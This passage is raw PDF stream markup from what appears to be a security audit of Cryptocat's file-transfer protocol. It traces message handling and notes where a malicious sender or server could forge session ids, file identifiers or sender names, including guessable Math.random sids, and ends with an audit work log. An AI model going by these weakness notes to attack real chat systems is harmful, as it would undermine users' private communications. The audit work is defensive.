(fileKeys[sendersNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 369 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 357 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 273 cm q BT 1 0 0 1 0 86 Tm .031797 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the unencrypted and unauthenticated strophe file-transfer message is received in the) Tj T* 0 Tw .655318 Tw (file receiver, the message comes with a ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (field containing the nickname of the sender, as) Tj T* 0 Tw 1.063984 Tw (supplied by the server. The file receiver takes these five fields: from, sid, file identifier $called) Tj T* 0 Tw 2.626651 Tw ("filename" in the protocol and in the source$, size, and mime-type, and stores them in a) Tj T* 0 Tw 2.020888 Tw (hashtable named ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (. They are indexed in ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (first by) Tj T* 0 Tw .049147 Tw /F4 10 Tf (from ) Tj /F1 10 Tf (and then by ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. The strophe implementation sends back an acknowledgement message) Tj T* 0 Tw 1.065697 Tw ($a "noop" in the strophe protocol$ to indicate to the sender that the ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ($In-Band-Bytestream$) Tj T* 0 Tw (protocol is supported.) Tj T* ET Q Q q 1 0 0 1 23 267 cm Q q 1 0 0 1 23 267 cm Q q 1 0 0 1 23 111 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 141 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 146 Tm .044985 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The file transmitter can choose to send anything it likes for sid, file identifier, size, and) Tj T* 0 Tw 2.078651 Tw (mime type. The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose an sid that matches an ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by a) Tj T* 0 Tw .83686 Tw (different peer of the file receiver client, or that matches an ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by the file receiver) Tj T* 0 Tw 1.343516 Tw (client, if it chose. $The ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (could be learned by other peers or by the server, or could) Tj T* 0 Tw .531647 Tw (even be guessed "blind" if necessary since they have only approximately 10,000 possible) Tj T* 0 Tw .876905 Tw (values and are generated by ) Tj /F4 10 Tf (Math.random) Tj /F1 10 Tf (.$ The file transmitter ) Tj /F3 10 Tf (could not ) Tj /F1 10 Tf (choose a file) Tj T* 0 Tw .25311 Tw (identifier that matches a file identifier used by a different peer of the file receiver client $file) Tj T* 0 Tw 3.044524 Tw (identifiers are too large to be guessed and are generated with cryptographic-quality) Tj T* 0 Tw .269982 Tw (randomness$. The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose a file identifier that matches a file identifier) Tj T* 0 Tw .869213 Tw (used by itself previously or concurrently. The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose a file identifier) Tj T* 0 Tw 2.552126 Tw (used by the file receiver client in a previous or concurrent file-) Tj /F3 10 Tf (send ) Tj /F1 10 Tf (operation in the) Tj T* 0 Tw .966412 Tw (opposite direction \227 from the client currently operating as file receiver, if it previously or) Tj T* 0 Tw (concurrently sent a file.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 105 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 93 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 98 Tm 1.465366 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The server can choose anything that the file transmitter could choose $from 5.b.a.) Tj T* 0 Tw 1.448314 Tw (above$. $There is no end-to-end encryption or authentication to prevent the server from) Tj T* 0 Tw 1.232651 Tw (seeing and altering these values as it likes.$ In addition, the server can send the ) Tj /F4 10 Tf (from) Tj T* 0 Tw 1.399983 Tw /F1 10 Tf (field set to whatever it likes $there is not, at this point, any cryptographic authentication) Tj T* 0 Tw .009984 Tw (showing that the controller of a certain nick sent these fields$. In addition, the server knows) Tj T* 0 Tw .64881 Tw (the exact ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by each client and could send a ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (chosen to match any of them.) Tj T* 0 Tw .455984 Tw (In addition, the server knows the file identifiers used by all clients $since the file identifiers) Tj T* 0 Tw 1.437126 Tw (are sent unencrypted in the strophe protocol, in addition to being sent encrypted in the) Tj T* 0 Tw /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol$, so it could choose to send a file identifier equal to any of them.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 123.0236 cm Q q 1 0 0 1 62.69291 93.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 15 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (6.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .17561 Tw (Now the following event might eventually occur in the file transmitter, as caused by the network send) Tj T* 0 Tw (from the receiver's strophe implementation in 5.b:) Tj T* ET Q Q q 1 0 0 1 23 -3 cm Q q 1 0 0 1 23 -3 cm Q q Q Q endstream endobj % 'R200': class PDFStream 200 0 obj % page stream << /Length 10319 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 639.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 113 Tm T* ET q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 111 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 75 cm q BT 1 0 0 1 0 38 Tm .439979 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the strophe acknowledgement message from the file receiver arrives $indicating that) Tj T* 0 Tw 1.177318 Tw (the receiver is capable of ) Tj /F3 10 Tf (IBB) Tj /F1 10 Tf ($, then the file transmitter sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('open' message, which) Tj T* 0 Tw 2.32748 Tw (contains the receiver's nickname, the sid, and the chunksize. This message is transmitted) Tj T* 0 Tw (unencrypted and unauthenticated.) Tj T* ET Q Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 57 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (N.B. the file transmitter can choose anything it likes to send for the sid and the chunksize.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 51 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.935366 Tw (N.B. the server can choose anything that the file transmitter could choose $from 6.a.a) Tj T* 0 Tw 2.611984 Tw (above$. In addition, the server can send the "from" field set to whatever it likes. As) Tj T* 0 Tw (mentioned above, the server also knows the sids of all clients.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 15 cm Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg ($See ) Tj /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 135 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (7.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 123 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .904985 Tw (Now the following event might eventually occur in the file receiver, as caused by the network send) Tj T* 0 Tw (from the file transmitter's 6.a.:) Tj T* ET Q Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 105 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 45 cm q BT 1 0 0 1 0 62 Tm .578651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('open' message is received, the client uses the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values from) Tj T* 0 Tw 8.553615 Tw (the message to retrieve the file identifier from the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, i.e.) Tj T* 0 Tw .458863 Tw /F4 10 Tf (fileIdentifier) Tj ( ) Tj (= rcvFile[from][sid].filename) Tj /F1 10 Tf (, and then fetches the keys from the) Tj T* 0 Tw .099974 Tw /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (hashtable, i.e. ) Tj /F4 10 Tf (key) Tj ( ) Tj (= fileKeys[from][fileIdentifier]) Tj /F1 10 Tf (, and then stores the) Tj T* 0 Tw 1.160888 Tw (keys in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, i.e. ) Tj /F4 10 Tf (rcvFile[from][sid].key) Tj ( ) Tj (=) Tj ( ) Tj (key) Tj /F1 10 Tf (, and then deletes) Tj T* 0 Tw (the key from the ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (hashtable, i.e. ) Tj /F4 10 Tf (delete) Tj ( ) Tj (fileKeys[from][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The file receiver client then sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message back to the file transmitter.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 5.209974 Tw 12 TL /F1 10 Tf 0 0 0 rg ($See case 'open' in ) Tj /F4 10 Tf (Cryptocat.ibbHandler ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (open ) Tj /F1 10 Tf (in) Tj T* 0 Tw /F4 10 Tf (strophe.ibb.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 477.0236 cm Q q 1 0 0 1 62.69291 76.86614 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 385.1575 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (8.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 373.1575 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .17561 Tw (Now the following event might eventually occur in the file transmitter, as caused by the network send) Tj T* 0 Tw (from the file receiver's 7.a., or as caused by the network send from the file receiver's 9.a.:) Tj T* ET Q Q q 1 0 0 1 23 367.1575 cm Q q 1 0 0 1 23 367.1575 cm Q q 1 0 0 1 23 319.1575 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 2.902126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message is received in reply to the ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("open" message, the) Tj T* 0 Tw 1.808294 Tw (file-transmitter client executes ) Tj /F4 10 Tf (Cryptocat.sendFileData ) Tj /F1 10 Tf ($from ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf ($ with) Tj T* 0 Tw .576457 Tw (its ) Tj /F4 10 Tf (to ) Tj /F1 10 Tf (argument set to the intended receiver's nick, and its ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (argument set to the sid. $See) Tj T* 0 Tw /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 313.1575 cm Q q 1 0 0 1 23 -4.84252 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 303 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 279 cm q BT 1 0 0 1 0 26 Tm 1.239979 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the file transmitter's ) Tj /F4 10 Tf (sendFileData ) Tj /F1 10 Tf (method is invoked, the file transmitter looks) Tj T* 0 Tw .204597 Tw (up the file-being-sent's position, filehandle, counter, and encryption key, and total size from the) Tj T* 0 Tw /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable in the ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (, under the index of the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 213 cm q BT 1 0 0 1 0 50 Tm .407045 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then computes the bounds of the next chunk of the file $where a "chunk" is) Tj T* 0 Tw .717209 Tw (64,511 bytes long, or shorter if there are not that many bytes left in the file$, starting from the) Tj T* 0 Tw 1.844983 Tw (current "position", sets the position $on the object in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable under the ) Tj /F4 10 Tf (sid) Tj T* 0 Tw .104104 Tw /F1 10 Tf (index$ to the index number of the next byte after the chunk, and increments the counter $on the) Tj T* 0 Tw (object in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index$.) Tj T* ET Q Q q 1 0 0 1 23 171 cm q BT 1 0 0 1 0 26 Tm .00936 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then reads the chunk from disk, and when the chunk is loaded into memory,) Tj T* 0 Tw .461235 Tw (it encrypts it with ) Tj /F3 10 Tf (AES-256 ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode using the encryption key and counter from the object) Tj T* 0 Tw (stored under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable.) Tj T* ET Q Q q 1 0 0 1 23 129 cm q BT 1 0 0 1 0 26 Tm .387485 Tw 12 TL /F1 10 Tf 0 0 0 rg (It then generates a header consisting of the counter value and the total number of chunks and) Tj T* 0 Tw 1.751318 Tw (computes a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (over that header plus the ciphertext chunk, using the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key from the) Tj T* 0 Tw (object stored under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable.) Tj T* ET Q Q q 1 0 0 1 23 87 cm q BT 1 0 0 1 0 26 Tm .95186 Tw 12 TL /F1 10 Tf 0 0 0 rg (It then appends the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag to the ciphertext chunk and sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("data" message with) Tj T* 0 Tw 1.804269 Tw (the data consisting of ciphertext chunk followed by the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag. The ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("data" message) Tj T* 0 Tw (includes, in addition to the data, a ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 69 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (N.B. the file transmitter can choose anything it likes to send for the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 27 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.704597 Tw (N.B. the server can choose anything that the file transmitter could choose $from 8.b.a) Tj T* 0 Tw 2.411984 Tw (above$. In addition, the server can send the "from" field set to whatever it likes. As) Tj T* 0 Tw (mentioned above, the server also knows the sids of all clients.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .870651 Tw 12 TL /F1 10 Tf 0 0 0 rg (When/if the file transmitter receives an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message in response to this send, then it) Tj T* 0 Tw (invokes its ) Tj /F4 10 Tf (sendFileData ) Tj /F1 10 Tf (method again.) Tj T* ET Q Q q Q Q q Q Q endstream endobj % 'R201': class PDFStream 201 0 obj % page stream << /Length 3621 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 -1 Tm T* ET q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 -1 Tm T* ET q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg ($See ) Tj /F4 10 Tf (Cryptocat.sendFileData ) Tj /F1 10 Tf (from ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 747.0236 cm Q q 1 0 0 1 62.69291 525.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 207 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (9.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 195 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .904985 Tw (Now the following event might eventually occur in the file receiver, as caused by the network send) Tj T* 0 Tw (from the file-transmitter's 7.b.:) Tj T* ET Q Q q 1 0 0 1 23 189 cm Q q 1 0 0 1 23 189 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 177 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 153 cm q BT 1 0 0 1 0 26 Tm .763984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('data' message is received, the client uses the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values from) Tj T* 0 Tw .979318 Tw (the message to look up the object in the ) Tj /F4 10 Tf (rcvFiles ) Tj /F1 10 Tf (hashtable indexed under the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and) Tj T* 0 Tw (then the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 135 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (From that object it reads an ) Tj /F4 10 Tf (abort ) Tj /F1 10 Tf (flag, and if that flag is set it returns.) Tj T* ET Q Q q 1 0 0 1 23 57 cm q BT 1 0 0 1 0 62 Tm 1.950651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Next, from that object it reads the encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys, counter, and total number of) Tj T* 0 Tw 1.174983 Tw (blocks. It generates a header containing the counter and total number of blocks, computes a) Tj T* 0 Tw 2.113516 Tw /F3 10 Tf (MAC ) Tj /F1 10 Tf (on that header using the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, parses out the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag from the data from the) Tj T* 0 Tw .85561 Tw (message, and compares its generated ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag to the one from the message. If they differ, it) Tj T* 0 Tw .862651 Tw (sets the ) Tj /F4 10 Tf (abort ) Tj /F1 10 Tf (flag on the object indexed under ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable) Tj T* 0 Tw (and returns.) Tj T* ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 26 Tm .181751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Next, it decrypts the chunk using the key and counter. It appends the plaintext chunk data to an) Tj T* 0 Tw 3.018651 Tw (attribute named ) Tj /F4 10 Tf (data ) Tj /F1 10 Tf (of the object which is indexed under the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (in the) Tj T* 0 Tw /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, and increments the counter in that object.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg ($See the 'data' case in ) Tj /F4 10 Tf (Cryptocat.ibbHandler ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 525.0236 cm Q q 1 0 0 1 62.69291 525.0236 cm Q endstream endobj % 'R202': class PDFStream 202 0 obj % page stream << /Length 10076 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix B: Work Log) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 14 Tm 1.757318 Tw 12 TL /F1 10 Tf 0 0 0 rg (We checked the Chrome store archive against the git tag and discovered a discrepancy. We created) Tj T* 0 Tw 0 0 .501961 rg (Issue 500 ) Tj 0 0 0 rg (to highlight this issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 708.0236 cm Q q 1 0 0 1 62.69291 708.0236 cm Q q 1 0 0 1 62.69291 660.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.146412 Tw (Part of this issue is that the Chrome store automatically transcodes images which changes the) Tj T* 0 Tw 1.150651 Tw (archive contents and hash from what a developer submits. This inhibits an auditor from building a) Tj T* 0 Tw .478555 Tw (Chrome package to compare against the Chrome store release. We attempted to notify the Chrome) Tj T* 0 Tw (store about this issue.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 660.0236 cm Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We examined changes in the ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf (dependency.) Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 624.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Discovered ) Tj /F4 10 Tf (extra_symkey ) Tj /F1 10 Tf (which is used for file transfer.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 624.0236 cm Q q 1 0 0 1 62.69291 594.0236 cm q BT 1 0 0 1 0 14 Tm .241318 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (prepareMsg ) Tj /F1 10 Tf (function which is used for both chat messages and to initiate file) Tj T* 0 Tw (transfers.) Tj T* ET Q Q q 1 0 0 1 62.69291 588.0236 cm Q q 1 0 0 1 62.69291 588.0236 cm Q q 1 0 0 1 62.69291 564.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.316905 Tw 12 TL /F1 10 Tf 0 0 0 rg (Things we ) Tj /F3 10 Tf (didn't ) Tj /F1 10 Tf (cover: ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (-based authentication, the user interface when it fails, the code) Tj T* 0 Tw (implementing same.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 564.0236 cm Q q 1 0 0 1 62.69291 534.0236 cm q BT 1 0 0 1 0 14 Tm .122196 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined file transfer thoroughly throughout the ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (etc/fileTransfer.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (,) Tj T* 0 Tw (and ) Tj /F4 10 Tf (lib/crypto-js/*.js) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm Q q 1 0 0 1 62.69291 528.0236 cm Q q 1 0 0 1 62.69291 462.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 39 cm q BT 1 0 0 1 0 14 Tm .001984 Tw 12 TL /F1 10 Tf 0 0 0 rg (We mainly focused on the call stack in the ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (dependency, rather than analysing the entire) Tj T* 0 Tw (codebase, so we focused on the ) Tj /F3 10 Tf (AES ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode implementations.) Tj T* ET Q Q q 1 0 0 1 23 33 cm Q q 1 0 0 1 23 33 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 